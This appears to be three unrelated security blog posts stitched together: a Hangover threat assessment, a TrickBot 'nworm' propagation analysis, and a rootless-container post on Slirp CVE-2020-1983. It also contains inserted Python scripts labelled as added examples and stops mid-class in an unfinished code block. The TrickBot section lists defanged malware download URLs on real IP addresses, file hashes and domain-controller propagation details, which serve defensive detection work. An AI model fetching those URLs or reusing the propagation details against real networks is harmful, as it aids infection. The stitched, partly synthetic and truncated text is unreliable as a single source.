Threat Assessment: Hangover Threat Group

Executive Summary

Unit 42 researchers recently published on activity by the Hangover threat group (aka Neon, Viceroy Tiger, MONSOON) carrying out targeted attacks that deploy BackConfig malware against government and military organizations in South Asia. As a result, we’ve created this threat assessment report for the Hangover Group’s activities. The techniques and campaigns can be visualized using the Unit 42 Playbook Viewer.

Hangover Group is a cyberespionage group that was first observed in December 2013 carrying out a cyberattack against a telecom corporation in Norway. Cybersecurity firm Norman reported that the attacks originated from India and that the group sought out and attacked targets of national interest, such as Pakistan and China. However, there have also been indicators of Hangover activity in the U.S. and Europe, mainly focused on government, military, and civilian organizations. The Hangover Group's initial vector of compromise is spear-phishing. The group uses local and topical news lures from the South Asia region to make victims more likely to fall for its social engineering and download and execute a weaponized Microsoft Office document. After the user opens the weaponized document, backdoor communication is established between BackConfig and the threat actors, allowing them to carry out espionage activity and potentially exfiltrate sensitive data from compromised systems.

Palo Alto Networks Threat Prevention platform with WildFire, DNS Security and Cortex XDR detects activity associated with this threat group. Customers can also review activity associated with this Threat Assessment using AutoFocus with the following tags: Hangover and BackConfig.

Impact Assessment

Several adversarial techniques were observed in this activity, and the following measures are suggested within Palo Alto Networks’ products and services to mitigate threats related to the Hangover Group, as well as other groups using the same techniques:

Tactic - Technique (MITRE ATT&CK ID)
    Product / Service
    • Course of Action

Initial Access - Spearphishing Link (T1192)
    NGFW
    • Ensure application security policies exist when allowing traffic from an untrusted zone to a more trusted zone
    • Ensure 'Service setting of ANY' in a security policy allowing traffic does not exist
    • Ensure 'Security Policy' denying any/all traffic to/from IP addresses on Trusted Threat Intelligence Sources exists
    Threat Prevention†
    • Ensure that antivirus profiles are set to block on all decoders except 'imap' and 'pop3'
    • Ensure a secure antivirus profile is applied to all relevant security policies
    • Ensure that User Credential Submission uses the action of 'block' or 'continue' on the URL categories
    DNS Security
    • Enable DNS Security in Anti-Spyware profile
    URL Filtering
    • Ensure that PAN-DB URL Filtering is used
    • Ensure that URL Filtering uses the action of 'block' or 'override' on the <enterprise approved value> URL categories
    • Ensure that access to every URL is logged
    • Ensure all HTTP Header Logging options are enabled
    • Ensure secure URL filtering is enabled for all security policies allowing traffic to the Internet
    WildFire
    • Ensure that WildFire file size upload limits are maximized
    • Ensure forwarding of decrypted content to WildFire is enabled
    • Ensure all WildFire session information settings are enabled
    • Ensure alerts are enabled for malicious files detected by WildFire
    • Ensure 'WildFire Update Schedule' is set to download and install updates every minute

Execution - Exploitation for Client Execution (T1203)
    Threat Prevention†
    • Ensure a Vulnerability Protection Profile is set to block attacks against critical and high vulnerabilities, and set to default on medium, low, and informational vulnerabilities
    • Ensure a secure Vulnerability Protection Profile is applied to all security rules allowing traffic
    Cortex XDR
    • Enable Anti-Exploit and Anti-Malware Protection

Execution - User Execution (T1204)
    NGFW
    • Ensure that User-ID is only enabled for internal trusted interfaces
    • Ensure that 'Include/Exclude Networks' is used if User-ID is enabled
    • Ensure that the User-ID Agent has minimal permissions if User-ID is enabled
    • Ensure that the User-ID service account does not have interactive logon rights
    • Ensure remote access capabilities for the User-ID service account are forbidden
    • Ensure that security policies restrict User-ID Agent traffic from crossing into untrusted zones
    Threat Prevention†
    • Ensure that antivirus profiles are set to block on all decoders except 'imap' and 'pop3'
    • Ensure a secure antivirus profile is applied to all relevant security policies
    • Ensure an anti-spyware profile is configured to block on all spyware severity levels, categories, and threats
    • Ensure DNS sinkholing is configured on all anti-spyware profiles in use
    • Ensure passive DNS monitoring is set to enabled on all anti-spyware profiles in use
    • Ensure a secure anti-spyware profile is applied to all security policies permitting traffic to the Internet
    DNS Security
    • Enable DNS Security in Anti-Spyware profile
    URL Filtering
    • Ensure that PAN-DB URL Filtering is used
    • Ensure that URL Filtering uses the action of 'block' or 'override' on the <enterprise approved value> URL categories
    • Ensure that access to every URL is logged
    • Ensure all HTTP Header Logging options are enabled
    • Ensure secure URL filtering is enabled for all security policies allowing traffic to the Internet
    WildFire
    • Ensure that WildFire file size upload limits are maximized
    • Ensure forwarding of decrypted content to WildFire is enabled
    • Ensure all WildFire session information settings are enabled
    • Ensure alerts are enabled for malicious files detected by WildFire
    • Ensure 'WildFire Update Schedule' is set to download and install updates every minute
    Cortex XDR
    • Enable Anti-Exploit and Anti-Malware Protection

Execution - Scripting (T1064)
    WildFire
    • Ensure that WildFire file size upload limits are maximized
    • Ensure forwarding of decrypted content to WildFire is enabled
    • Ensure all WildFire session information settings are enabled
    • Ensure alerts are enabled for malicious files detected by WildFire
    • Ensure 'WildFire Update Schedule' is set to download and install updates every minute
    Cortex XDR
    • Enable Anti-Exploit and Anti-Malware Protection

Defense Evasion - BITS Jobs (T1197)
    NGFW
    • Ensure that User-ID is only enabled for internal trusted interfaces
    • Ensure that 'Include/Exclude Networks' is used if User-ID is enabled
    • Ensure that the User-ID Agent has minimal permissions if User-ID is enabled
    • Ensure that the User-ID service account does not have interactive logon rights
    • Ensure remote access capabilities for the User-ID service account are forbidden
    • Ensure that security policies restrict User-ID Agent traffic from crossing into untrusted zones
    • Ensure application security policies exist when allowing traffic from an untrusted zone to a more trusted zone
    • Ensure 'Service setting of ANY' in a security policy allowing traffic does not exist
    • Ensure 'Security Policy' denying any/all traffic to/from IP addresses on Trusted Threat Intelligence Sources exists
    Cortex XDR
    • Configure Host Firewall Profile

Defense Evasion - Code Signing (T1116)
    Cortex XDR
    • Enable Anti-Exploit and Anti-Malware Protection

Defense Evasion - Hidden Files and Directories (T1158)
    Cortex XDR
    • Configure Behavioral Threat Protection under the Malware Security Profile

Defense Evasion - Deobfuscate/Decode Files or Information (T1140)
    WildFire
    • Ensure that WildFire file size upload limits are maximized
    • Ensure forwarding of decrypted content to WildFire is enabled
    • Ensure all WildFire session information settings are enabled
    • Ensure alerts are enabled for malicious files detected by WildFire
    • Ensure 'WildFire Update Schedule' is set to download and install updates every minute

Defense Evasion - Obfuscated Files or Information (T1027)
    WildFire
    • Ensure that WildFire file size upload limits are maximized
    • Ensure forwarding of decrypted content to WildFire is enabled
    • Ensure all WildFire session information settings are enabled
    • Ensure alerts are enabled for malicious files detected by WildFire
    • Ensure 'WildFire Update Schedule' is set to download and install updates every minute
    Cortex XDR
    • Enable Anti-Exploit and Anti-Malware Protection

Command and Control - Commonly Used Port (T1043)
    NGFW
    • Ensure application security policies exist when allowing traffic from an untrusted zone to a more trusted zone
    • Ensure 'Service setting of ANY' in a security policy allowing traffic does not exist
    • Ensure 'Security Policy' denying any/all traffic to/from IP addresses on Trusted Threat Intelligence Sources exists
    URL Filtering
    • Ensure that PAN-DB URL Filtering is used
    • Ensure that URL Filtering uses the action of 'block' or 'override' on the <enterprise approved value> URL categories
    • Ensure that access to every URL is logged
    • Ensure all HTTP Header Logging options are enabled
    • Ensure secure URL filtering is enabled for all security policies allowing traffic to the Internet

Command and Control - Standard Cryptographic Protocol (T1032)
    NGFW
    • Ensure 'SSL Forward Proxy Policy' for traffic destined to the Internet is configured
    • Ensure 'SSL Inbound Inspection' is required for all untrusted traffic destined for servers using SSL or TLS
    • Ensure that the Certificate used for Decryption is Trusted
    • Ensure application security policies exist when allowing traffic from an untrusted zone to a more trusted zone
    • Ensure 'Service setting of ANY' in a security policy allowing traffic does not exist
    • Ensure 'Security Policy' denying any/all traffic to/from IP addresses on Trusted Threat Intelligence Sources exists
    Threat Prevention†
    • Ensure that antivirus profiles are set to block on all decoders except 'imap' and 'pop3'
    • Ensure a secure antivirus profile is applied to all relevant security policies
    • Ensure an anti-spyware profile is configured to block on all spyware severity levels, categories, and threats
    • Ensure DNS sinkholing is configured on all anti-spyware profiles in use
    • Ensure passive DNS monitoring is set to enabled on all anti-spyware profiles in use
    • Ensure a secure anti-spyware profile is applied to all security policies permitting traffic to the Internet
    DNS Security
    • Enable DNS Security in Anti-Spyware profile
    URL Filtering
    • Ensure that PAN-DB URL Filtering is used
    • Ensure that URL Filtering uses the action of 'block' or 'override' on the <enterprise approved value> URL categories
    • Ensure that access to every URL is logged
    • Ensure all HTTP Header Logging options are enabled
    • Ensure secure URL filtering is enabled for all security policies allowing traffic to the Internet
    WildFire
    • Ensure that WildFire file size upload limits are maximized
    • Ensure forwarding of decrypted content to WildFire is enabled
    • Ensure all WildFire session information settings are enabled
    • Ensure alerts are enabled for malicious files detected by WildFire
    • Ensure 'WildFire Update Schedule' is set to download and install updates every minute

Command and Control - Remote File Copy (T1105)
    NGFW
    • Ensure application security policies exist when allowing traffic from an untrusted zone to a more trusted zone
    • Ensure 'Service setting of ANY' in a security policy allowing traffic does not exist
    • Ensure 'Security Policy' denying any/all traffic to/from IP addresses on Trusted Threat Intelligence Sources exists
    WildFire
    • Ensure that WildFire file size upload limits are maximized
    • Ensure forwarding of decrypted content to WildFire is enabled
    • Ensure all WildFire session information settings are enabled
    • Ensure alerts are enabled for malicious files detected by WildFire
    • Ensure 'WildFire Update Schedule' is set to download and install updates every minute

Command and Control - Standard Application Layer Protocol (T1071)
    NGFW
    • Ensure application security policies exist when allowing traffic from an untrusted zone to a more trusted zone
    • Ensure 'Service setting of ANY' in a security policy allowing traffic does not exist
    • Ensure 'Security Policy' denying any/all traffic to/from IP addresses on Trusted Threat Intelligence Sources exists
    Threat Prevention†
    • Ensure that antivirus profiles are set to block on all decoders except 'imap' and 'pop3'
    • Ensure a secure antivirus profile is applied to all relevant security policies
    • Ensure an anti-spyware profile is configured to block on all spyware severity levels, categories, and threats
    • Ensure DNS sinkholing is configured on all anti-spyware profiles in use
    • Ensure passive DNS monitoring is set to enabled on all anti-spyware profiles in use
    • Ensure a secure anti-spyware profile is applied to all security policies permitting traffic to the Internet
    DNS Security
    • Enable DNS Security in Anti-Spyware profile
    URL Filtering
    • Ensure that PAN-DB URL Filtering is used
    • Ensure that URL Filtering uses the action of 'block' or 'override' on the <enterprise approved value> URL categories
    • Ensure that access to every URL is logged
    • Ensure all HTTP Header Logging options are enabled
    • Ensure secure URL filtering is enabled for all security policies allowing traffic to the Internet

Table 1. Courses of Action for Hangover Group
†These capabilities are part of the NGFW security subscriptions service

Conclusion

The Hangover Group is active and, according to Unit 42 visibility, is targeting government and military organizations in South Asia.

The group continues to make use of compromised, third-party infrastructure to support the delivery of their weaponized documents, using spear-phishing emails containing links to said sites.

The delivery documents continue to evolve and, over the years, have moved from plain-text code and URLs to encoded content: from storing encoded executables within the documents, to using ZIP files containing a package of files, to finally downloading executables from command and control servers.

The installation of the BackConfig malware by the delivery documents is performed using multiple stages and components, most likely to evade sandboxes or other automated analysis and detection systems. This includes the use of Virtualization-based Security (VBS), batch codes, scheduled tasks, and conditional trigger files.

Once fully installed, the BackConfig malware communicates with the threat actors over HTTPS, which blends in with other similar traffic and potentially makes visibility and detection more difficult.

Once an infected system is under an actor’s control, the objective varies depending on the plugins deployed and the type of system or organization compromised.

Additional Resources

The suggested courses of action in this report are based on the information currently available to Palo Alto Networks and the capabilities within Palo Alto Networks’ products and services.

Goodbye Mworm, Hello Nworm: TrickBot Updates Propagation Module

Executive Summary

First discovered in 2016, TrickBot is an information stealer that provides backdoor access sometimes used by criminal groups to distribute other malware. TrickBot uses modules to perform different functions, and one key function is propagating from an infected Windows client to a vulnerable Domain Controller (DC). TrickBot currently uses three modules for propagation. As early as April 2020, TrickBot updated one of its propagation modules known as "mworm" to a new module called "nworm." Infections caused through nworm leave no artifacts on an infected DC, and they disappear after a reboot or shutdown.

Other key differences of the new nworm module include:

    • It retrieves an encrypted or otherwise encoded binary over network traffic that represents a TrickBot executable file (the old mworm module sent it as an executable file without any encryption or encoding).
    • A TrickBot infection caused by the new nworm module is run from system RAM and does not appear to remain persistent on an infected host.
    • This is a much better method of evading detection on an infected DC.

TrickBot is a significant threat that has received high-profile coverage in recent years, and this is a notable evolution. This blog reviews TrickBot modules, and it covers characteristics of the new nworm module in greater detail.

TrickBot Modules

TrickBot is modular, meaning it uses various binaries to perform different functions during an infection. In most cases, the basis of a TrickBot infection is a malicious Windows executable (EXE) file saved to disk. This EXE is often called a "TrickBot loader" because it loads the TrickBot modules. TrickBot modules are dynamic link libraries (DLLs) or EXEs run from system memory. See Figure 1 for a visualization of TrickBot modules.

Figure 1. A visual representation of TrickBot and its modules.

On an infected Windows 10 host, TrickBot modules are only found in system memory. But on an infected Windows 7 host, we also see artifacts related to the modules stored on the disk. These artifacts are encrypted binaries. During a TrickBot infection, these encrypted binaries are decrypted and run from system memory as TrickBot modules. Figure 2 shows an example of artifacts for TrickBot modules from an infection on a Windows 7 client in January 2020.

Figure 2. Example of artifacts for TrickBot modules on an infected Windows 7 client.

As seen in Figure 2, the artifact names end with 64, meaning this host is running a 64-bit version of Windows 7. If the infection happens on a 32-bit Windows 7 host, these artifact names would end in 32 instead of 64.

Figure 2 also reveals three modules TrickBot uses to spread to a DC in an Active Directory (AD) environment. They are:

    • mwormDll64 (the "mworm" module)
    • mshareDll64 (the "mshare" module)
    • tabDll64 (the "tab" module)

Note: The tab module has a propagation function, but it also includes different capabilities not applicable to this blog.

Modules for Propagation

Starting in September 2019, TrickBot modules with propagation capabilities have been mworm, mshare, and tab. They generate distinct activity when propagating to a vulnerable DC.

For the mshare and tab modules:

    • An infected Windows client retrieves a new TrickBot EXE using an HTTP URL.
    • The infected Windows client sends this new TrickBot EXE over SMB traffic to the vulnerable DC.

For the mworm module:

    • The infected Windows client uses an SMB exploit targeting the vulnerable DC.
    • The vulnerable DC retrieves a new TrickBot EXE using an HTTP URL and infects itself with it.

Of note, the mworm module did not usually appear unless the TrickBot infection happened in an AD environment with a DC.

Figure 3 shows a flow chart of propagation traffic caused by these three TrickBot modules.

Figure 3. TrickBot propagation flow chart from September 2019 through March 2020.

Since February 2020, the URLs generated by these modules to retrieve follow-up TrickBot EXE files have used the following patterns:

    • URL generated by mshare module ends with /images/cursor.png
    • URL generated by mworm module ends with /images/redcar.png
    • URL generated by tab module ends with /images/imgpaper.png

These URLs use IP addresses instead of domains. Figure 4 shows an example of the traffic filtered in Wireshark from a pcap of a TrickBot infection in March 2020.

Figure 4. HTTP GET requests caused by TrickBot’s mshare, mworm and tab modules.

Goodbye Mworm: Hello Nworm

In April 2020, while we were generating a TrickBot infection in a lab environment, TrickBot stopped using the mworm module. In its place, a new artifact named "nworm" appeared on an infected Windows 7 client. Figure 5 shows an example of this new nworm artifact.

Figure 5. New nworm module found from an infection on April 24, 2020.

HTTP traffic for follow-up TrickBot EXEs caused by nworm is noticeably different from traffic caused by mworm. The differences are:

    • mworm: URL for TrickBot EXE ends with /images/redcar.png
    • nworm: URL for TrickBot EXE ends with /ico/VidT6cErs
    • mworm: Follow-up TrickBot EXE is returned unencrypted in the HTTP traffic
    • nworm: Follow-up TrickBot EXE is returned as an encrypted or otherwise encoded binary in the HTTP traffic

By using Wireshark and examining TCP streams, we can easily spot the differences in HTTP traffic caused by the old mworm module and the new nworm module. Figure 6 shows traffic from the mworm module in March 2020, and Figure 7 shows traffic from the nworm module in April 2020.

Figure 6. TCP stream showing HTTP traffic caused by the mworm module in March 2020.
Figure 7. TCP stream showing HTTP traffic caused by the nworm module in April 2020.

Figure 8 shows the current propagation flowchart, highlighting changes seen with the nworm module since April 2020.

Figure 8. TrickBot propagation flow chart since April 2020.

Like mworm, the new nworm module does not appear unless the TrickBot infection happens in an AD environment with a DC.
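A defender's triage of the request patterns described above, as an added example that is not part of the original post: it tags proxy log lines by propagation module using the path suffixes given here, checks that the host is an IP literal, and flags whether the fetching host is the one the post says should fetch the EXE (the client for mshare and tab, the DC itself for mworm and nworm). The log line format and the sample lines are constructed; the IP addresses and URLs are taken from the post.

```python
"""Triage HTTP GET requests by the TrickBot propagation module that issued them.

Added example; not code from the original post. The URL path suffixes, the
client/DC addresses and the payload forms come from the post. The log line
layout ("<requester_ip> GET <url>") is a constructed format for the sample.
"""
import ipaddress
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Path suffix of the follow-up TrickBot EXE URL per module (from the post).
MODULE_PATH_SUFFIXES = {
    "mshare": "/images/cursor.png",
    "mworm": "/images/redcar.png",
    "tab": "/images/imgpaper.png",
    "nworm": "/ico/VidT6cErs",
}

# Which host fetches the EXE: mshare/tab fetch on the client and push it over
# SMB; mworm/nworm make the DC fetch it itself (post, "Modules for Propagation").
EXPECTED_REQUESTER = {"mshare": "client", "tab": "client",
                      "mworm": "dc", "nworm": "dc"}

# What the HTTP response body looks like, where the post says so.
PAYLOAD_FORM = {"mworm": "cleartext EXE", "nworm": "encrypted/encoded blob"}


@dataclass
class Hit:
    requester: str
    module: str
    url: str
    host_is_ip: bool         # post: these URLs use IP literals, not domains
    requester_role: str      # "client" or "dc"
    role_matches_post: bool  # True if the fetching host is the one the post expects
    payload_form: str


def refang(url: str) -> str:
    """Turn a defanged URL such as hxxp://1.2.3[.]4/x back into a parseable one."""
    return re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE).replace("[.]", ".")


def classify_url(url: str):
    """Return (module, host_is_ip) for a known propagation URL, else None."""
    parsed = urlparse(refang(url))
    for module, suffix in MODULE_PATH_SUFFIXES.items():
        if parsed.path.endswith(suffix):
            try:
                ipaddress.ip_address(parsed.hostname or "")
                host_is_ip = True
            except ValueError:
                host_is_ip = False
            return module, host_is_ip
    return None


def triage_line(line: str, dc_hosts):
    """Parse one constructed log line '<requester_ip> GET <url>' into a Hit or None."""
    parts = line.split()
    if len(parts) != 3 or parts[1] != "GET":
        return None
    requester, url = parts[0], parts[2]
    found = classify_url(url)
    if found is None:
        return None
    module, host_is_ip = found
    role = "dc" if requester in dc_hosts else "client"
    return Hit(
        requester=requester,
        module=module,
        url=refang(url),
        host_is_ip=host_is_ip,
        requester_role=role,
        role_matches_post=(role == EXPECTED_REQUESTER[module]),
        payload_form=PAYLOAD_FORM.get(module, "not stated in the post"),
    )


def triage_log(lines, dc_hosts):
    """Run triage_line over every line and keep the hits."""
    hits = [triage_line(line, dc_hosts) for line in lines]
    return [h for h in hits if h is not None]


# Constructed sample: addresses from the post's Figures 9/10, URLs from its IoC list.
DC_HOSTS = {"10.4.20.4"}
SAMPLE_LOG = [
    "10.4.20.101 GET hxxp://107.172.221[.]106/images/cursor.png",    # mshare, on client
    "10.4.20.101 GET hxxp://107.172.221[.]106/images/imgpaper.png",  # tab, on client
    "10.4.20.4 GET hxxp://107.172.221[.]106/ico/VidT6cErs",          # nworm, DC fetches itself
    "10.4.20.101 GET http://updates.example.test/images/logo.png",   # unrelated request
]

if __name__ == "__main__":
    for hit in triage_log(SAMPLE_LOG, DC_HOSTS):
        print(f"{hit.requester} [{hit.requester_role}] -> {hit.module}: {hit.url} "
              f"(ip-literal={hit.host_is_ip}, expected-host={hit.role_matches_post}, "
              f"payload={hit.payload_form})")
```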

TrickBot Caused By Nworm: Not Persistent

When nworm infects a vulnerable DC, the malware is run from memory. No artifacts are found on the infected DC and TrickBot on the DC doesn’t survive a reboot.

In cases where mshare and tab infect a vulnerable DC with TrickBot, these infections remain persistent on the DC, but TrickBot caused by nworm is not persistent. This shouldn’t be an issue for the malware, because the DC is a server and servers rarely shut down or reboot like a Windows client.

Post-Infection Gtag from TrickBot Caused By Nworm

Every TrickBot binary has an identifier called a gtag. This is found in configuration data extracted from a TrickBot binary. Gtags can also be found in HTTP traffic during a TrickBot infection. They indicate the specific campaign or source of infection used for a TrickBot binary.

The gtag is a short alphabetic string followed by a number that increments sequentially. Examples follow:

    • mor-series gtag: TrickBot caused by an Emotet infection, for example: TrickBot gtag mor84 caused by Emotet on January 27th, 2020.
    • ono-series gtag: various TrickBot infections initiated through malicious Microsoft Office documents like Word documents or Excel spreadsheets, distributed through English-language emails.
    • red-series gtag: TrickBot distributed as a DLL file instead of an EXE, for example: TrickBot gtag red5 documented on March 17th, 2020.

Gtags for TrickBot binaries used by TrickBot modules are unique to the module. They break down as:

    • tot-series gtag: TrickBot binaries used by mshare module
    • jim-series gtag: TrickBot binaries used by nworm (and the old mworm) module
    • lib-series gtag: TrickBot binaries used by tab module

Figure 9 and Figure 10 show gtags from traffic filtered in Wireshark from an infection on April 20th, 2020. In these images, the Windows client is at 10.4.20.101, and the DC is at 10.4.20.4.

Figure 9. The initial TrickBot infection, where HTTP traffic from an infected client at 10.4.20.101 shows gtag ono38.
Figure 10. TrickBot spreads to the DC where we see gtag jim716 from an infection caused by the nworm module.
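Gtag decoding and the client-to-DC correlation shown in Figures 9 and 10, as an added example (not the post's code): parse_gtag() splits the letters from the one-up number, describe_gtag() maps the series to the sources and modules listed above, and correlate_spread() links a propagation-series gtag on one host to an initial-infection gtag seen earlier on another. The observation tuples are constructed from the figures.

```python
"""Decode TrickBot gtags and correlate initial-infection and propagation gtags across hosts.

Added example; not code from the original post. The gtag format (letters plus a
one-up number) and the series-to-source mapping are the post's; the observation
tuples are constructed from the post's Figures 9 and 10.
"""
import re

GTAG_RE = re.compile(r"^(?P<series>[a-z]+)(?P<serial>\d+)$")

# Series the post ties to a distribution channel or source of infection.
INFECTION_SOURCE = {
    "mor": "TrickBot dropped by an Emotet infection",
    "ono": "malicious Office document sent in English-language email",
    "red": "TrickBot distributed as a DLL rather than an EXE",
}

# Series the post ties to the propagation modules (binaries pushed to a DC).
PROPAGATION_MODULE = {
    "tot": "mshare",
    "jim": "nworm (formerly mworm)",
    "lib": "tab",
}


def parse_gtag(gtag: str):
    """Split 'jim716' into ('jim', 716); return None if the format does not match."""
    m = GTAG_RE.match(gtag.strip().lower())
    if m is None:
        return None
    return m.group("series"), int(m.group("serial"))


def describe_gtag(gtag: str):
    """Explain a gtag in the terms the post uses, or None if it is not a gtag."""
    parsed = parse_gtag(gtag)
    if parsed is None:
        return None
    series, serial = parsed
    if series in PROPAGATION_MODULE:
        kind, detail = "propagation", PROPAGATION_MODULE[series]
    elif series in INFECTION_SOURCE:
        kind, detail = "initial", INFECTION_SOURCE[series]
    else:
        kind, detail = "unknown", "series not covered by the post"
    return {"series": series, "serial": serial, "kind": kind, "detail": detail}


def correlate_spread(observations):
    """Pair each propagation gtag with initial-infection gtags seen earlier on other hosts.

    observations: iterable of (host, gtag) in the order they were seen on the wire.
    Returns one record per (initial host -> propagated host) link, so a jim-series
    gtag on the DC after an ono-series gtag on a client reads as nworm spreading.
    """
    initial_seen = []   # (host, gtag) with kind == "initial"
    links = []
    for host, gtag in observations:
        info = describe_gtag(gtag)
        if info is None:
            continue
        if info["kind"] == "initial":
            initial_seen.append((host, gtag))
        elif info["kind"] == "propagation":
            for src_host, src_gtag in initial_seen:
                if src_host != host:
                    links.append({
                        "from": src_host, "initial_gtag": src_gtag,
                        "to": host, "gtag": gtag, "module": info["detail"],
                    })
    return links


# Constructed from the post: client 10.4.20.101 shows ono38, then DC 10.4.20.4 shows jim716.
OBSERVATIONS = [
    ("10.4.20.101", "ono38"),
    ("10.4.20.4", "jim716"),
]

if __name__ == "__main__":
    for link in correlate_spread(OBSERVATIONS):
        print(link)
```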

Conclusion

An infection caused by nworm is run from system memory, leaves no artifacts on an infected DC and disappears after a reboot or shutdown. Furthermore, the TrickBot binary used by nworm is encrypted or otherwise encoded when it is retrieved over the Internet. These characteristics are likely an attempt by TrickBot developers to avoid detection.

This is the latest in a series of changes in TrickBot as it evolves within our current threat landscape.

However, best security practices like running fully-patched and up-to-date versions of Microsoft Windows will hinder or prevent TrickBot infections. Palo Alto Networks customers are further protected from TrickBot by our threat prevention platform. AutoFocus users can track TrickBot activity by using the TrickBot tag.

Indicators of Compromise

Recent HTTP URLs for TrickBot binaries for propagation to vulnerable DC

(Read: First seen YYYY-MM-DD - module name - URL)

2020-04-20 - nworm - hxxp://107.172.221[.]106/ico/VidT6cErs
2020-04-20 - mshare - hxxp://107.172.221[.]106/images/cursor.png
2020-04-20 - tab - hxxp://107.172.221[.]106/images/imgpaper.png
2020-05-08 - nworm - hxxp://23.95.227[.]159/ico/VidT6cErs
2020-05-08 - mshare - hxxp://23.95.227[.]159/images/cursor.png
2020-05-08 - tab - hxxp://23.95.227[.]159/images/imgpaper.png

SHA256 hash for nwormDll64 artifact (encrypted binary) from an infected Windows 7 client on April 24th 2020:

900aa025bf770102428350e584e8110342a70159ef2f92a9bfd651c5d8e5f76b

SHA256 hash for nwormDll64 artifact (encrypted binary) from an infected Windows 7 client on May 8th 2020:

85d88129eab948d44bb9999774869449ab671b4d1df3c593731102592ce93a70

Rootless Containers: The Next Trend in Container Security

Executive Summary

As cloud computing evolves, containers continue to grow in popularity, and new solutions and ideas for how we implement containers keep being introduced. One of these new ideas is rootless containers.

Rootless containers are containers that do not require root privileges in order to be created. Many solutions have been proposed to overcome the technical challenges of creating a container as an unprivileged user; some are still under development and some are production-ready. While rootless containers present some advantages, mainly from a security perspective, they are still in their early stages.

In this post, Unit 42 researcher Aviv Sasson reviews the internals of rootless containers. Aviv also presents a vulnerability he found in one of the major rootless networking components called Slirp. Palo Alto Networks customers running Prisma Cloud are protected from this vulnerability with the host and container vulnerability scanner, which alerts on software components running with this vulnerability.

Background

As the name implies, rootless containers are the same as conventional containers except that they do not need root privileges in order to be created.

Rootless containers are still in the early adoption stage, but they are already supported by the major players in the field.

There are several reasons why rootless containers have emerged.

    • Adding a new security layer. In case the container engine, runtime or orchestrator is compromised, the attacker won't gain root privileges on the host.
    • Allowing multiple unprivileged users to run containers on the same machine (e.g. HPC).
    • Allowing isolation inside nested containers.

This solution was made possible by a new development in the Linux kernel that allows unprivileged users to create new user namespaces. When a user creates and enters a new user namespace, they become root in the context of that namespace and gain most of the privileges required to spawn a functioning container.

I won’t dig into the technicalities of user namespaces, but namespace root isn’t as privileged as real root in areas that affect the entire system (for example, a namespace root cannot load or unload kernel modules). This led to some challenges that were solved differently by each container engine.

Networking

To allow proper networking inside a container, a Virtual Ethernet device (VETH) is usually created and put in charge of the networking. This poses a problem for rootless containers, as only real root has the privileges to create such devices. A number of solutions were proposed to solve the problem, the main ones being Slirp and LXC-user-nic.

Slirp

Slirp was originally designed as an internet dial-up solution for unprivileged users. In time, it found a new purpose as a networking stack for virtual machines and emulators, including the well-known QEMU (Quick Emulator). After some modifications, it was adapted to enable networking in rootless containers. It works by forking into the container’s user and network namespaces and creating a tap device that becomes the default route. It then passes the device’s file descriptor to the parent, which runs in the default network namespace and is now able to communicate both with the container and with the internet.

Figure 1. Slirp networking flow

LXC-User-Nic

Another way to set up networking is to run a setuid binary that creates a VETH device. Although this does enable networking inside the container, it misses the point of rootless containers because it requires the container binary to run with root privileges.

Storage

One of the complex elements in implementing containers is storage management. By default, container engines use a special driver called Overlay2 (or Overlay) to create a layered filesystem that is efficient in both space and performance. This cannot be done with rootless containers, as most Linux distributions don’t allow mounting overlay filesystems in user namespaces (Ubuntu is an exception). This problem drove rootless containers to work with other drivers and filesystems.

The obvious solution was to use another driver, like the VFS storage driver. While it works, it is significantly less efficient. The better solution was to create a new storage driver suited to the needs of rootless containers. One such driver is FUSE-OverlayFS, a user-space implementation of Overlay that is more efficient than VFS and can run inside user namespaces.

Cgroups

The Linux control group (cgroups) feature, another key element of implementing containers, allows processes and containers to be organized into hierarchical groups whose usage of various types of resources can then be limited and monitored. Since the kernel’s cgroups interface is provided through a pseudo-filesystem that usually resides in “/sys” (a root-owned directory), a non-root user cannot access or use it.

To tackle this problem, two approaches were proposed:

Cgroups V2

A new kernel implementation of cgroups that supports delegating permissions to unprivileged users. The downside is that v2 doesn’t support all the controllers that were implemented for cgroups v1 (e.g. devices, net_cls, net_prio).

PAM module

Another solution to the problem, by LXC, is to install pam_cgfs.so, which is a Pluggable Authentication Module (PAM module) that will allow unprivileged users to authenticate and manage cgroups.

Adoption status

The following container engines support rootless containers with the following components:

                Docker                          Podman                            LXC
Networking      Slirp, Lxc-user-nic, VPNkit     Slirp                             Lxc-user-nic
Storage         VFS                             FUSE-OverlayFS                    VFS
Cgroups         No support                      Limited support for cgroups v2    PAM module

Table 1. Adoption status

As seen in the table above, the most prominent container engines are working to support the various aspects of rootless containers, spearheaded by Podman and LXC.

Security

From a security perspective, there is a big benefit in using rootless containers. The premise in the security world is that any software can be compromised, whether through vulnerabilities or through misconfigurations, and that includes container implementations. We should always run any software with as few privileges as possible, so that when a security bug is exploited, the impact is minimized.

While rootless containers should be considered more secure, they rely on new features and components that haven’t yet been widely tested and reviewed. These components may inadvertently become another attack vector. One example is the networking solution of rootless containers: LXC-user-nic or Slirp could be vulnerable to security issues that would affect both the container and the host.

LXC-user-nic has had multiple vulnerabilities that allowed privilege escalation, such as CVE-2017-5985 and CVE-2018-6556. Slirp is another example: in recent years, several vulnerabilities were disclosed in it, including a heap overflow that can lead to code execution on the host. To avoid a total takeover, Slirp’s maintainers added sandbox functionality and seccomp support to their software, but in practice container engines run Slirp without seccomp support because it is still experimental, so it may be possible to escape the sandbox.

Slirp - CVE-2020-1983

As part of my research, I looked into Slirp in order to detect and fix possible vulnerabilities. While fuzzing the software, I identified a use-after-free vulnerability that can crash Slirp. The vulnerability was assigned CVE-2020-1983.

The issue lies in how Slirp manages IP fragmentation. The maximum size of an IP packet is 65,535 bytes, and that limit is supposed to apply when fragmenting IP packets as well. The bug was that Slirp doesn’t verify the size of the fragmented IP packet, and when it tries to fragment a packet larger than 65,535 bytes, it crashes.

When Slirp stops, the container loses its network stack and effectively becomes unusable.
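The following is an added example, not Slirp’s code, showing the kind of bound a fragment handler must enforce: every fragment’s offset plus length has to stay within the 65,535-byte IPv4 maximum, and input that violates it is rejected up front instead of being trusted by later buffer logic. The fragment tuples used are constructed samples; the class and function names are my own.

```python
"""Bounded IP fragment reassembly (added example; not Slirp's code).

Illustrates the class of bug described above: a reassembler that trusts
fragment offsets and lengths can be driven past the 65,535-byte IPv4
maximum. The check in add_fragment() is the guard that was missing.
Constructed sample fragments are used; no real packets are involved.
"""

IP_MAX_LEN = 65535  # maximum IPv4 total length (16-bit field)


class FragmentError(ValueError):
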